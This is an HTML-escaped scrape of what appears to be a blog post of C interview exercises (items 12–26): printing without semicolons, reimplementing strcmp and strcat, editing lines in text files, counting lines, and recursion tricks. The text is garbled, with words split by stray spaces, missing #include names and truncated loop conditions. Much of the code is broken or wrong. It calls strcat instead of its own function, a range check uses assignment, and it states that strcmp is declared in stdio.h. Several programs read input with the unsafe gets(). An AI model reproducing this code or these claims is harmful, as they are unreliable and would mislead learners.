&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
12.Write a program to print&quot;Hello World&quot;without using semicolon anywhere in the code.&lt;br /&gt;Generally when we use printf(&quot;&quot;) statement, we have to use a semicolon at the end. If printf is used inside an if&lt;br /&gt;Condition, semicolon can be avoided.&lt;br /&gt;Program: Program to print something without using semicolon (;)&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;//printf returns the length of string being printed&lt;br /&gt;if (printf(&quot;H ello World\n&quot;)) //prints Hello World and returns 11&lt;br /&gt;{&lt;br /&gt;//do nothing&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Hello World&lt;br /&gt;Explanatio n:&lt;br /&gt;The if statement checks for condition whether the return value of printf(&quot;He llo World&quot;) is greater than 0. printf&lt;br /&gt;function returns the length of the string printed. Hence the statement if (printf(&quot;H ello World&quot;)) prints the string&lt;br /&gt;&quot;Hello World&quot;.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
13.Write a program to print a semicolon without using a semicolon anywhere in the code.&lt;br /&gt;Generally when use printf(&quot;&quot;) statement we have to use semicolon at the end.&lt;br /&gt;If we want to print a semicolon, we use the statement: printf(&quot;;&quot; );&lt;br /&gt;In above statement, we are using two semicolons . The task of printing a semicolon without using semicolon anywhere in the code can be accomplish ed by using the ascii value of&#39;;&#39;which is equal to 59.&lt;br /&gt;Program: Program to print a semicolon without using semicolon in the code.&lt;br /&gt;#include&lt;br /&gt;int main(void) {&lt;br /&gt;//prints the character with ascii value 59, i.e., semicolon&lt;br /&gt;if (printf(&quot;% c\n&quot;, 59)){&lt;br /&gt;//prints semicolon&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;;&lt;br /&gt;Explanatio n:&lt;br /&gt;If statement checks whether return value of printf function is greater than zero or not. The return value of function&lt;br /&gt;call printf(&quot;%c &quot;,59) is 1. As printf returns the length of the string printed. printf(&quot;%c &quot;,59) prints ascii value that&lt;br /&gt;correspond s to 59, that is semicolon( .&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
14.Write a program to compare two strings without using strcmp() function.&lt;br /&gt;strcmp() function compares two strings lexicograp hically. strcmp is declared in stdio.h&lt;br /&gt;Case 1: when the strings are equal, it returns zero.&lt;br /&gt;Case 2: when the strings are unequal, it returns the difference between ascii values of the characters that differ.&lt;br /&gt;a) When string1 is greater than string2, it returns positive value.&lt;br /&gt;b) When string1 is lesser than string2, it returns negative value.&lt;br /&gt;Syntax:&lt;br /&gt;int strcmp (const char *s1, const char *s2);&lt;br /&gt;Program: to compare two strings.&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;int cmpstr(cha r s1[10], char s2[10]);&lt;br /&gt;int main(){&lt;br /&gt;char arr1[10] =&quot;Nodalo&quot;;&lt;br /&gt;char arr2[10] =&quot;nodalo&quot;;&lt;br /&gt;printf(&quot;%d&quot;, cmpstr(arr 1, arr2));&lt;br /&gt;// cmpstr() is equivalent of strcmp()&lt;br /&gt;return 0;&lt;br /&gt;}/&lt;br /&gt;/s1, s2 are strings to be compared&lt;br /&gt;int cmpstr(cha r s1[10], char s2[10]){&lt;br /&gt;//strlen function returns the length of argument string passed&lt;br /&gt;int i = strlen(s1) ;&lt;br /&gt;int k = strlen(s2) ;&lt;br /&gt;int bigger;&lt;br /&gt;if (i&amp;lt;k){&lt;br /&gt;bigger = k;&lt;br /&gt;}&lt;br /&gt;else if (i&amp;gt;k){&lt;br /&gt;bigger = i;&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;bigger = i;&lt;br /&gt;}&lt;br /&gt;//loops&#39;bigger&#39;times&lt;br /&gt;for (i = 0; i&amp;lt;bigger; i++){&lt;br /&gt;// if ascii values of characters s1[i], s2[i] are equal do nothing&lt;br /&gt;if (s1[i] == s2[i]){&lt;br /&gt;}&lt;br /&gt;//else return the ascii difference&lt;br /&gt;else{&lt;br /&gt;return (s1[i] - s2[i]);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;//return 0 when both strings are same&lt;br /&gt;//This statement is executed only when both strings are equal&lt;br /&gt;return (0);&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;-32&lt;br /&gt;Explanatio n:&lt;br /&gt;cmpstr() is a function that illustrate s C standard function strcmp(). Strings to be compared are sent as arguments&lt;br /&gt;to cmpstr().&lt;br /&gt;Each character in string1 is compared to its correspond ing character in string2. Once the loop encounters a&lt;br /&gt;differing character in the strings, it would return the ascii difference of the differing characters and exit.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
15.Write a program to concatenat e two strings without using strcat() function.&lt;br /&gt;strcat(str ing1,strin g2) is a C standard function declared in the header file string.h&lt;br /&gt;The strcat() function concatenat es string2, string1 and returns string1.&lt;br /&gt;Program: Program to concatenat e two strings&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;char *strct(cha r *c1, char *c2);&lt;br /&gt;char *strct(cha r *c1, char *c2){&lt;br /&gt;//strlen function returns length of argument string&lt;br /&gt;int i = strlen(c1) ;&lt;br /&gt;int k = 0;&lt;br /&gt;// loops until null is encountered and appends string c2 to c1&lt;br /&gt;while (c2[k] !=&#39;\0&#39;){&lt;br /&gt;c1[i + k] = c2[k];&lt;br /&gt;k++;&lt;br /&gt;}&lt;br /&gt;return c1;&lt;br /&gt;}&lt;br /&gt;int main(){&lt;br /&gt;char string1[15 ] =&quot;first&quot;;&lt;br /&gt;char string2[15 ] =&quot;second&quot;;&lt;br /&gt;char *finalstr;&lt;br /&gt;printf(&quot;Be fore concatenat ion:&quot;&lt;br /&gt;&quot;\n string1 = %s \n string2 = %s&quot;, string1, string2);&lt;br /&gt;// addresses of string1, string2 are passed to strct()&lt;br /&gt;finalstr = strcat(str ing1, string2);&lt;br /&gt;printf(&quot;\n After concatenat ion:&quot;);&lt;br /&gt;//prints the contents of string whose address is in finalstr&lt;br /&gt;printf(&quot;\n finalstr = %s&quot;, finalstr);&lt;br /&gt;//prints the contents of string1&lt;br /&gt;printf(&quot;\n string1 = %s&quot;, string1);&lt;br /&gt;//prints the contents of string2&lt;br /&gt;printf(&quot;\n string2 = %s&quot;, string2);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Before concatenat ion:&lt;br /&gt;string1 = first&lt;br /&gt;string2 = second&lt;br /&gt;After concatenat ion:&lt;br /&gt;finalstr = firstsecon d&lt;br /&gt;string1 = firstsecon d&lt;br /&gt;string2 = second&lt;br /&gt;Explanatio n:&lt;br /&gt;string2 is appended at the end of string1 and contents of string2 are unchanged.&lt;br /&gt;In strct() function, using a for loop, all the characters of string&#39;c2&#39;are copied at the end of c1. return (c1) is&lt;br /&gt;equivalent to return&amp;amp;c1[0] and it returns the base address of&#39;c1&#39;.&#39;finalstr&#39; stores that address returned by the&lt;br /&gt;function strct().&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
16.Write a program to delete a specified line from a text file.&lt;br /&gt;In this program, user is asked for a filename he needs to change. User is also asked for the line number that is&lt;br /&gt;to be deleted. The filename is stored in&#39;filename&#39; . The file is opened and all the data is transferre d to another file&lt;br /&gt;except that one line the user specifies to delete.&lt;br /&gt;Program: Program to delete a specific line.&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;FILE *fp1, *fp2;&lt;br /&gt;// consider 40 character string to store filename&lt;br /&gt;char filename[4 0];&lt;br /&gt;char c;&lt;br /&gt;int del_line, temp = 1;&lt;br /&gt;//asks user for file name&lt;br /&gt;printf(&quot;En ter file name:&quot;);&lt;br /&gt;// receives file name from user and stores in&#39;filename&#39;&lt;br /&gt;scanf(&quot;%s&quot; , filename);&lt;br /&gt;//open file in read mode&lt;br /&gt;fp1 = fopen(file name,&quot;r&quot;);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;//until the last character of file is obtained&lt;br /&gt;while (c != EOF)&lt;br /&gt;{&lt;br /&gt;printf(&quot;%c &quot;, c);&lt;br /&gt;//print current character and read next character&lt;br /&gt;c = getc(fp1);&lt;br /&gt;}&lt;br /&gt;//rewind&lt;br /&gt;rewind(fp1 );&lt;br /&gt;printf(&quot;\n Enter line number of the line to be deleted:&quot;) ;&lt;br /&gt;//accept number from user.&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;del_line) ;&lt;br /&gt;//open new file in write mode&lt;br /&gt;fp2 = fopen(&quot;cop y.c&quot;,&quot;w&quot;);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;while (c != EOF){&lt;br /&gt;c = getc(fp1);&lt;br /&gt;if (c ==&#39;\n&#39;)&lt;br /&gt;temp++;&lt;br /&gt;//except the line to be deleted&lt;br /&gt;if (temp != del_line)&lt;br /&gt;{&lt;br /&gt;//copy all lines in file copy.c&lt;br /&gt;putc(c, fp2);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;//close both the files.&lt;br /&gt;fclose(fp1 );&lt;br /&gt;fclose(fp2 );&lt;br /&gt;//remove original file&lt;br /&gt;remove(fil ename);&lt;br /&gt;//rename the file copy.c to original name&lt;br /&gt;rename(&quot;co py.c&quot;, filename);&lt;br /&gt;printf(&quot;\n The contents of file after being modified are as follows:\n &quot;);&lt;br /&gt;fp1 = fopen(file name,&quot;r&quot;);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;while (c != EOF){&lt;br /&gt;printf(&quot;%c &quot;, c);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;}&lt;br /&gt;fclose(fp1 );&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter file name:abc.t xt&lt;br /&gt;hi.&lt;br /&gt;Hello&lt;br /&gt;how are you?&lt;br /&gt;I am fine&lt;br /&gt;hope the same&lt;br /&gt;Enter line number of the line to be deleted:4&lt;br /&gt;The contents of file after being modified are as follows:&lt;br /&gt;hi.&lt;br /&gt;hello&lt;br /&gt;how are you?&lt;br /&gt;hope the same&lt;br /&gt;Explanatio n:&lt;br /&gt;In this program, user is asked for a filename that needs to be modified. Entered file name is stored in a char&lt;br /&gt;array&#39;filename&#39; . This file is opened in read mode using file pointer&#39;fp1&#39;. Character&#39;c&#39;is used to read characters&lt;br /&gt;from the file and print them to the output. User is asked for the line number in the file to be deleted. The file&lt;br /&gt;pointer is rewinded back and all the lines of the file except for the line to be deleted are copied into another file&lt;br /&gt;&quot;copy.c&quot;. Now&quot;copy.c&quot;is renamed to the original filename. The original file is opened in read mode and the&lt;br /&gt;modified contents of the file are displayed on the screen.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
17.Write a program to replace a specified line in a text file.&lt;br /&gt;Program: Program to replace a specified line in a text file.&lt;br /&gt;#include&lt;br /&gt;int main(void) {&lt;br /&gt;FILE *fp1, *fp2;&lt;br /&gt;// &#39;filename&#39;i s a 40 character string to store filename&lt;br /&gt;char filename[4 0];&lt;br /&gt;char c;&lt;br /&gt;int del_line, temp = 1;&lt;br /&gt;//asks user for file name&lt;br /&gt;printf(&quot;En ter file name:&quot;);&lt;br /&gt;// receives file name from user and stores in&#39;filename&#39;&lt;br /&gt;scanf(&quot;%s&quot; , filename);&lt;br /&gt;fp1 = fopen(file name,&quot;r&quot;);&lt;br /&gt;//open file in read mode&lt;br /&gt;c = getc(fp1);&lt;br /&gt;//print the contents of file .&lt;br /&gt;while (c != EOF){&lt;br /&gt;printf(&quot;%c &quot;, c);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;}&lt;br /&gt;//ask user for line number to be deleted.&lt;br /&gt;printf(&quot;\n Enter line number to be deleted and replaced&quot;) ;&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;del_line) ;&lt;br /&gt;//take fp1 to start point.&lt;br /&gt;rewind(fp1 );&lt;br /&gt;//open copy.c in write mode&lt;br /&gt;fp2 = fopen(&quot;cop y.c&quot;,&quot;w&quot;);&lt;br /&gt;c = getc(fp1);&lt;br /&gt;while (c != EOF){&lt;br /&gt;if (c ==&#39;\n&#39;){&lt;br /&gt;temp++;&lt;br /&gt;}&lt;br /&gt;// till the line to be deleted comes,copy the content from one file to other&lt;br /&gt;if (temp != del_line){&lt;br /&gt;putc(c, fp2);&lt;br /&gt;}&lt;br /&gt;else //when the line to be deleted comes&lt;br /&gt;{&lt;br /&gt;while ((c = getc(fp1)) !=&#39;\n&#39;){&lt;br /&gt;}&lt;br /&gt;//read and skip the line ask for new text&lt;br /&gt;printf(&quot;En ter new text&quot;);&lt;br /&gt;//flush the input stream&lt;br /&gt;fflush(std in);&lt;br /&gt;putc(&#39;\n&#39;, fp2);&lt;br /&gt;//put&#39;\n&#39;in new file&lt;br /&gt;while ((c = getchar()) !=&#39;\n&#39;)&lt;br /&gt;putc(c, fp2);&lt;br /&gt;//take the data from user and place it in new file&lt;br /&gt;fputs(&quot;\n&quot; , fp2);&lt;br /&gt;temp++;&lt;br /&gt;}&lt;br /&gt;// continue this till EOF is encountere d&lt;br /&gt;c = getc(fp1);&lt;br /&gt;}&lt;br /&gt;//close both files&lt;br /&gt;fclose(fp1 );&lt;br /&gt;fclose(fp2 );&lt;br /&gt;//remove original file&lt;br /&gt;remove(fil ename);&lt;br /&gt;//rename new file with old name opens the file in read mode&lt;br /&gt;rename(&quot;co py.c&quot;, filename);&lt;br /&gt;fp1 = fopen(file name,&quot;r&quot;);&lt;br /&gt;//reads the character from file&lt;br /&gt;c = getc(fp1);&lt;br /&gt;// until last character of file is encountered&lt;br /&gt;while (c != EOF){&lt;br /&gt;printf(&quot;%c &quot;, c);&lt;br /&gt;// all characters are printed&lt;br /&gt;c = getc(fp1);&lt;br /&gt;}&lt;br /&gt;//close the file pointer&lt;br /&gt;fclose(fp1 );&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter file name:abc.t xt&lt;br /&gt;hi.&lt;br /&gt;hello&lt;br /&gt;how are you?&lt;br /&gt;hope the same&lt;br /&gt;Enter line number of the line to be deleted and replaced:4&lt;br /&gt;Enter new text: sayonara see you soon&lt;br /&gt;hi.&lt;br /&gt;hello&lt;br /&gt;how are you?&lt;br /&gt;sayonara see you soon&lt;br /&gt;Explanatio n:&lt;br /&gt;In this program, the user is asked to type the name of the file. The File by name entered by user is opened in&lt;br /&gt;read mode. The line number of the line to be replaced is asked as input. Next the data to be replaced is asked. A&lt;br /&gt;new file is opened in write mode named&quot;copy.c&quot;. Now the contents of original file are transferre d into new file&lt;br /&gt;and the line to be modified is deleted. New data is stored in its place and remaining lines of the original file are&lt;br /&gt;also transferre d. The copied file with modified contents is replaced with the original file&#39;s name. Both the file&lt;br /&gt;pointers are closed and the original file is again opened in read mode and the contents of the original file is&lt;br /&gt;printed as output.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
18.Write a program to find the number of lines in a text file.&lt;br /&gt;Number of lines in a file can be determined by counting the number of new line characters present.&lt;br /&gt;Program: Program to count number of lines in a file.&lt;br /&gt;#include&lt;br /&gt;int main()&lt;br /&gt;/* Ask for a filename and count number of lines in the file*/&lt;br /&gt;{&lt;br /&gt;//a pointer to a FILE structure&lt;br /&gt;FILE *fp;&lt;br /&gt;int no_lines = 0;&lt;br /&gt;// consider 40 character string to store filename&lt;br /&gt;char filename[4 0], sample_chr ;&lt;br /&gt;//asks user for file name&lt;br /&gt;printf(&quot;En ter file name:&quot;);&lt;br /&gt;// receives file name from user and stores in a string named&#39;filename&#39;&lt;br /&gt;scanf(&quot;%s&quot; , filename);&lt;br /&gt;//open file in read mode&lt;br /&gt;fp = fopen(file name,&quot;r&quot;);&lt;br /&gt;//get character from file and store in sample_chr&lt;br /&gt;sample_chr = getc(fp);&lt;br /&gt;while (sample_ch r != EOF){&lt;br /&gt;// Count whenever sample_chr is&#39;\n&#39;(new line) is encountere d&lt;br /&gt;if (sample_ch r ==&#39;\n&#39;)&lt;br /&gt;{&lt;br /&gt;// increment variable&#39;no_lines&#39; by 1&lt;br /&gt;no_lines=n o_lines+1;&lt;br /&gt;}&lt;br /&gt;//take next character from file.&lt;br /&gt;sample_chr = getc(fp);&lt;br /&gt;}&lt;br /&gt;fclose(fp) ; //close file.&lt;br /&gt;printf(&quot;Th ere are %d lines in %s \n&quot;, no_lines, filename);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter file name:abc.t xt&lt;br /&gt;There are 4 lines in abc.txt&lt;br /&gt;Explanatio n:&lt;br /&gt;In this program, name of the file to be read is taken as input. A file by the given name is opened in read-mode&lt;br /&gt;using a File pointer&#39;fp&#39;. Characters from the file are read into a char variable&#39;sample_ch r&#39;with the help of getc&lt;br /&gt;function. If a new line character( &#39;\n&#39;) is encountere d, the integer variable&#39;no_lines&#39; is incremente d. If the&lt;br /&gt;character read into&#39;sample_ch ar&#39;is not a new line character, next character is read from the file. This process is&lt;br /&gt;continued until the last character of the file(EOF) is encountere d. The file pointer is then closed and the total&lt;br /&gt;number of lines is shown as output.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
19.Write a C program which asks the user for a number between 1 to 9 and shows the number. If the&lt;br /&gt;user inputs a number out of the specified range, the program should show an error and prompt&lt;br /&gt;the user for a valid input.&lt;br /&gt;Program: Program for accepting a number in a given range.&lt;br /&gt;#include&lt;br /&gt;int getnumber( );&lt;br /&gt;int main(){&lt;br /&gt;int input = 0;&lt;br /&gt;//call a function to input number from key board&lt;br /&gt;input = getnumber( );&lt;br /&gt;//when input is not in the range of 1 to 9,print error message&lt;br /&gt;while (!((input = 1))){&lt;br /&gt;printf(&quot;[E RROR] The number you entered is out of range&quot;);&lt;br /&gt;//input another number&lt;br /&gt;input = getnumber( );&lt;br /&gt;}&lt;br /&gt;//this function is repeated until a valid input is given by user.&lt;br /&gt;printf(&quot;\n The number you entered is %d&quot;, input);&lt;br /&gt;return 0;&lt;br /&gt;}/&lt;br /&gt;/this function returns the number given by user&lt;br /&gt;int getnumber( ){&lt;br /&gt;int number;&lt;br /&gt;//asks user for a input in given range&lt;br /&gt;printf(&quot;\n Enter a number between 1 to 9 \n&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;number);&lt;br /&gt;return (number);&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter a number between 1 to 9&lt;br /&gt;45&lt;br /&gt;[ERROR] The number you entered is out of range&lt;br /&gt;Enter a number between 1 to 9&lt;br /&gt;4&lt;br /&gt;The number you entered is 4&lt;br /&gt;Explanatio n:&lt;br /&gt;getfunctio n() function accepts input from user.&#39;while&#39;loop checks whether the number falls within range or not&lt;br /&gt;and accordingl y either prints the number(If the number falls in desired range) or shows error message(nu mber is&lt;br /&gt;out of range).&lt;br /&gt;20.Write a program to display the multiplica tion table of a given number.&lt;br /&gt;Program: Multiplica tion table of a given number&lt;br /&gt;#include&lt;br /&gt;int main(){&lt;br /&gt;int num, i = 1;&lt;br /&gt;printf(&quot;\n Enter any Number:&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;num);&lt;br /&gt;printf(&quot;Mu ltiplicati on table of %d: \n&quot;, num);&lt;br /&gt;while (i&lt;br /&gt;printf(&quot;\n %d x %d = %d&quot;, num, i, num * i);&lt;br /&gt;i++;&lt;br /&gt;}&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;Output:&lt;br /&gt;Enter any Number:5&lt;br /&gt;5 x 1 = 5&lt;br /&gt;5 x 2 = 10&lt;br /&gt;5 x 3 = 15&lt;br /&gt;5 x 4 = 20&lt;br /&gt;5 x 5 = 25&lt;br /&gt;5 x 6 = 30&lt;br /&gt;5 x 7 = 35&lt;br /&gt;5 x 8 = 40&lt;br /&gt;5 x 9 = 45&lt;br /&gt;5 x 10 = 50&lt;br /&gt;Explanatio n:&lt;br /&gt;We need to multiply the given number (i.e. the number for which we want the multiplica tion table)&lt;br /&gt;with value of&#39;i&#39;which increments from 1 to 10.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
21. .WAP to check a string is Caliondrom e or not. // Maventic question.&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,j=0; char a[100];&lt;br /&gt;clrscr();&lt;br /&gt;printf(&quot;\n Enter the string to check for caliondrom e:\n&quot;);&lt;br /&gt;gets(a);&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
if(strlen( a)%6)&lt;br /&gt;{&lt;br /&gt;printf(&quot;\n %s: is Not a caliondrom e..&quot;,a);&lt;br /&gt;getch();&lt;br /&gt;exit(0);&lt;br /&gt;}&lt;br /&gt;for (i=0;a[i]! =&#39;\0&#39;&lt;br /&gt;{&lt;br /&gt;if((a[i]== a[i+5])&amp;amp;&amp;amp;( a[i+1]==a[ i+4])&amp;amp;&amp;amp;(a[ i+2]==a[i+ 3]))&lt;br /&gt;i=i+6;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
else&lt;br /&gt;{&lt;br /&gt;j=1;&lt;br /&gt;break;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;if(j)&lt;br /&gt;printf(&quot;\n %s: is Not a caliondrom e..&quot;,a);&lt;br /&gt;else&lt;br /&gt;printf(&quot;\n %s: is a caliondrom e..&quot;,a);&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
22.WAP to print DONE,witho ut using any loop. // asked to my frnd in any company.&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;static int i=0;&lt;br /&gt;printf(&quot;\n %d. DONE&quot;,i);&lt;br /&gt;if(i++&lt;br /&gt;main();&lt;br /&gt;getch();&lt;br /&gt;exit(0); / * I used exit(0) to terminate the program after 100 DONE,,i dunno why it was not terminating without using it,may be just at my system,try without it at ur sustem,it sud work */&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
23.WAP to print DONE,witho ut using any loop and any conditonal clause or operators.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
/* This code is just in purpose to solve the above question,, but its not a good code in programmin g,as its terminatin g at divide error,,if anyone have a better code,let me know */&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
main()&lt;br /&gt;{&lt;br /&gt;static int i=100;&lt;br /&gt;printf(&quot;%d . DONE\n&quot;,10 1-i);&lt;br /&gt;main(1/ --i);&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
/* use&quot;ctrl+f9&quot;,then&quot;alt+f5&quot;to see the result */&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
24. WAP to find out the longest word in a string.&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,max=0,co unt=0,j;&lt;br /&gt;char str[100]; / * ={&quot;INDIA IS DEMOCRATIC COUNTRY&quot;}; u can use a string inside,in place of user input */&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
printf(&quot;\n Enter the string\n:&quot; );&lt;br /&gt;gets(str);&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
for(i=0;i&lt;br /&gt;{&lt;br /&gt;if(!(str[i ]==32))&lt;br /&gt;{&lt;br /&gt;count++;&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
if(max&lt;br /&gt;{&lt;br /&gt;j=i-count;&lt;br /&gt;max=count;&lt;br /&gt;}&lt;br /&gt;count=0;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;for(i=j;i&lt;br /&gt;printf(&quot;%c &quot;,str[i]);&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
25.Prog of WORLD MAP.&lt;br /&gt;#include main(l ,a,n,d)cha r**a;{for(d=atoi (a[1])/ 10*80- atoi(a[2]) / 5-596;n=&quot;@N KA\CLCCGZA AQBEAADAFa ISADJABBA^ \SNLGAQABD AXIMBAACTB ATAHDBAN\Z cEMMCCCCAA hEIJFAEAAA BAfHJE\TBd FLDAANEfDN BPHdBcBBBE A_AL\ H E L L O, W O R L D!&quot;[l++-3];)f or(;n--&amp;gt;64 putchar(!d +++33^ l&amp;amp;1);print f(&quot;\n\n\n\ n\t\tFound By:\n\t\t\ t Amit Aru&quot;);getc h();}&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
26.WAP to print the triangle of letters in increasing order of lines.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #141823; font-family: Helvetica, Arial, &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 14px; line-height: 19.3199996948242px; margin-bottom: 6px; margin-top: 6px;&quot;&gt;
#include&lt;br /&gt;#include&lt;br /&gt;void main()&lt;br /&gt;{&lt;br /&gt;int i,j,k;&lt;br /&gt;char ch;&lt;br /&gt;printf(&quot;\n Enter the number of lines wants to make the triangle \n:&quot;);&lt;br /&gt;scanf(&quot;%d&quot; ,&amp;amp;i);&lt;br /&gt;for(j=1;j&lt;br /&gt;{&lt;br /&gt;ch=65;&lt;br /&gt;for(k=1;k&lt;br /&gt;{&lt;br /&gt;printf(&quot;%c &quot;,ch++);&lt;br /&gt;}&lt;br /&gt;printf(&quot;\n &quot;);&lt;br /&gt;}&lt;br /&gt;getch();&lt;br /&gt;}&lt;/div&gt;
